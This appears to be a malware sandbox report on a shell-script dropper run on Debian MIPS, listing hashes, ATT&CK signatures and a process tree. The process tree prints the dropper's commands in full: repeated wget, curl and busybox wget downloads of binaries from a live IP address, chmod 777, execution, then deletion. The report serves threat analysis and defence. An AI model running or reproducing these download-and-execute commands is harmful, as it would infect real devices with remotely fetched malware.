Analysis
-
max time kernel
149s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
-
Size
10KB
-
MD5
f79898139a1b167722dc600e9d8751bd
-
SHA1
c722cddfe77235ab1217ff62e01181953ff08a24
-
SHA256
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e
-
SHA512
99640786d2cad89e6932b07b8415be47959e635c05d46f6a9296711a1ba314dac17263a2d108e0af8a7ac270981f81c2065ac6f5cf718e3e5b9cff0d96e70137
-
SSDEEP
192:w/fwLnbwfOiNa6QAP8AnDlksBw8S8AnkksBw8t/fwLnAOiNa6I:zwOAP8AnDlksBw8S8AnkksBw8q
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 819 chmod 891 chmod 897 chmod 903 chmod 741 chmod 909 chmod 915 chmod 732 chmod 764 chmod 867 chmod 921 chmod 873 chmod 879 chmod 885 chmod 801 chmod 807 chmod 845 chmod 855 chmod 861 chmod -
Executes dropped EXE 19 IoCs
ioc pid Process /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 734 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 742 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 765 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 802 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 808 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 820 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 846 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 856 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 862 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 868 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 874 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 880 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 886 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 892 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 898 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 904 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 910 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 916 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 922 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl
Processes
-
/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:729
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:740
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:761
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:769
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:799
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:806
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:816
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:842
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:854
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:860
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:866
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:872
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:878
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:884
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:890
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:896
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:902
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:908
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:914
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:920
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:924
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97